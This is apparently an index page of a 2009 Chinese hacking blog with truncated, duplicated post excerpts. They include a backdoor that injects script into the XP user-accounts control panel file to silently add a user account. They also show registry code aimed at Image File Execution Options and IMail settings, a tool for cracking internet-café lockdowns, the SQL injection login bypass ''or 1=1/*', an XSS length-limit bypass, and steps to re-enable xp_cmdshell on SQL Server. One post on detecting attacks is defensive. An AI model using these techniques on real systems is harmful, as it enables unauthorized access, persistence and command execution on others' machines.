利用cpl文件在xp中留一个后门
[ 2009-07-03 22:13:41 | 作者: 黑枫无泪 ]
这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。
看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)
我们在里边加几行js语句:
var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)
...
阅读全文...
看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)
我们在里边加几行js语句:
var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)
...
阅读全文...
利用vbs创建注册表值较简单,创建注册表项的话,网上多是用wmi来,例如代码:
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ...
阅读全文...
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ...
阅读全文...
Eraae v1.7 黑刃网吧破解辅助软件 发布了
[ 2009-06-15 15:04:24 | 作者: 黑枫无泪 ]
Eraae v1.7软件介绍:
Eraae是一款网吧破解辅助软件,随着时间的流逝,Eraae v1.7终于出世了。
Eraae可以说是目前第一款能截获系统重启关机消息的网吧破解辅助软件。是网吧破解爱好者必不可缺少的武器。
更新记录:
1.增加启动画面...
2.增加硬盘实际容量和显卡型号获取...
3.修改在线下载浏览框和如果什么都不填就按“取消”会崩溃的问题...
4.增加Eraae以system权限启动...
5.增加文件管理删除文件提示...
6.增强顽固文件删除功能...
7.增加系统关机、重启消息截取...
8.修改无控件启动...
9.增强进程结束功能...
...
阅读全文...
Eraae是一款网吧破解辅助软件,随着时间的流逝,Eraae v1.7终于出世了。
Eraae可以说是目前第一款能截获系统重启关机消息的网吧破解辅助软件。是网吧破解爱好者必不可缺少的武器。
更新记录:
1.增加启动画面...
2.增加硬盘实际容量和显卡型号获取...
3.修改在线下载浏览框和如果什么都不填就按“取消”会崩溃的问题...
4.增加Eraae以system权限启动...
5.增加文件管理删除文件提示...
6.增强顽固文件删除功能...
7.增加系统关机、重启消息截取...
8.修改无控件启动...
9.增强进程结束功能...
...
阅读全文...
说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是
百分之百。
可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了
PHP注入。
其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。
其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。
如果你用这样的万能密码'or'='or',当然进不去,理由是GPC开启的时候单引号会被转换。
PHP注入时我常用的万能密码是:'or 1=1/*.
那我们分析一下为什么这可以进后台。
...
阅读全文...
百分之百。
可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了
PHP注入。
其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。
其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。
如果你用这样的万能密码'or'='or',当然进不去,理由是GPC开启的时候单引号会被转换。
PHP注入时我常用的万能密码是:'or 1=1/*.
那我们分析一下为什么这可以进后台。
...
阅读全文...
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Ipswitch\IMail\Domains"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath, arrSubKeys
...
阅读全文...
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Ipswitch\IMail\Domains"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath, arrSubKeys
...
阅读全文...
突破XSS字符数量限制执行任意JS代码
[ 2009-05-07 12:51:05 | 作者: 黑枫无泪 ]
==Ph4nt0m Security Team==
Issue 0x03, Phile #0x04 of 0x07
|=---------------------------------------------------------------------------=|
|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
|=---------------------------------------------------------------------------=|
...
阅读全文...
Issue 0x03, Phile #0x04 of 0x07
|=---------------------------------------------------------------------------=|
|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
|=---------------------------------------------------------------------------=|
...
阅读全文...
怎样检测不同操作系统下黑客发起的攻击
[ 2009-05-06 22:34:31 | 作者: 黑枫无泪 ]
多数计算机漏洞都能以多种方式被利用。黑客攻击可以利用某个特定的漏洞,而且对某些漏洞的利用会同时发生,黑客们还可以利用系统组件的某处错误配置或早些时候攻击留下的后门。
有鉴于此,检测黑客攻击并不是一件轻松事情,特别是对于一位不熟练的用户来说。本文将给出一些基本的指南,以帮助你决定自己的计算机是否受到了攻击,或者说你的系统安全是否受到了破坏。记住:就像对付病毒一样,并不能保证你用某种方法一定可以检测出一次黑客攻击。但是,如果你的系统遭受攻击,它就会表现出这样或那样的行为。
对Windows平台计算机的检测
Windows平台计算机遭受攻击的症状:
1.可疑的大量转出通信。如...
阅读全文...
有鉴于此,检测黑客攻击并不是一件轻松事情,特别是对于一位不熟练的用户来说。本文将给出一些基本的指南,以帮助你决定自己的计算机是否受到了攻击,或者说你的系统安全是否受到了破坏。记住:就像对付病毒一样,并不能保证你用某种方法一定可以检测出一次黑客攻击。但是,如果你的系统遭受攻击,它就会表现出这样或那样的行为。
对Windows平台计算机的检测
Windows平台计算机遭受攻击的症状:
1.可疑的大量转出通信。如...
阅读全文...
常见情况恢复执行xp_cmdshell
[ 2009-03-11 16:50:40 | 作者: 黑枫无泪 ]
常见情况恢复执行xp_cmdshell.
1 未能找到存储过程'master..xpcmdshell'.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
...
阅读全文...
1 未能找到存储过程'master..xpcmdshell'.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
...
阅读全文...
